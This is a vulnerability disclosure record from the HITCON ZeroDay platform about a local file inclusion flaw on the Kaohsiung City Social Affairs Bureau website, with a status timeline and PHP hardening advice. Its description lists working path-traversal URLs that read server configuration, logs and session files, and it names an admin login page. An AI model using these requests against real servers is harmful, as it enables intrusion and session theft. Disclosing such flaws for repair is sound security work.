Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00197
- Vendor: 高雄市政府社會局
- Title: 高雄市政府社會局 網站存在 LFI
- Introduction: 網站存在 LFI
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/05/12 15:22:50 : 新提交 (由 BTtea 更新此狀態)
- 2023/05/12 15:25:32 : 新提交 (由 BTtea 更新此狀態)
- 2023/05/14 21:38:08 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 20:55:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 20:55:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/05/29 20:55:39 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/07/12 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00197
- 通報者:blacktea_player (BTtea)
- 風險:高
- 類型:本地檔案引入 (Local File Inclusion, LFI)
參考資料
漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
相關網址
敘述
-
LFI
可以任意移動目錄查看檔案內容,通過fuzzing發現後端是 XAMPP 的結構
https://socbu.kcg.gov.tw/index.php?html=../../php/tests/parseDir/phpinfo.php
可以查看 httpd.conf 設定檔查看 log 設置
https://socbu.kcg.gov.tw/index.php?html=../../apache/conf/httpd.conf
https://socbu.kcg.gov.tw/index.php?html=../../xampp-control.ini
得到 log 與 session 路徑
https://socbu.kcg.gov.tw/index.php?html=../../apache/logs/access.log-05-12
https://socbu.kcg.gov.tw/index.php?html=../../apache/logs/error.log-05-12
https://socbu.kcg.gov.tw/index.php?html=../../tmp/sess_{PHPSESSID}
-
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
https://socbu.kcg.gov.tw/_php_module/login.php?item=login (後台)
修補建議
建議可以使用下方兩個語法來預防LFI與RFI。
ini_set('open_basedir','./');
ini_set('allow_url_include','off');
LFI攻擊與防禦解說:
https://www.twblogs.net/a/5b8d36622b717718833c52e6
LFI攻擊成因解說:
https://ithelp.ithome.com.tw/articles/10241555
LFI攻擊防禦原理解說:(wiki):
https://en.wikipedia.org/wiki/File_inclusion_vulnerability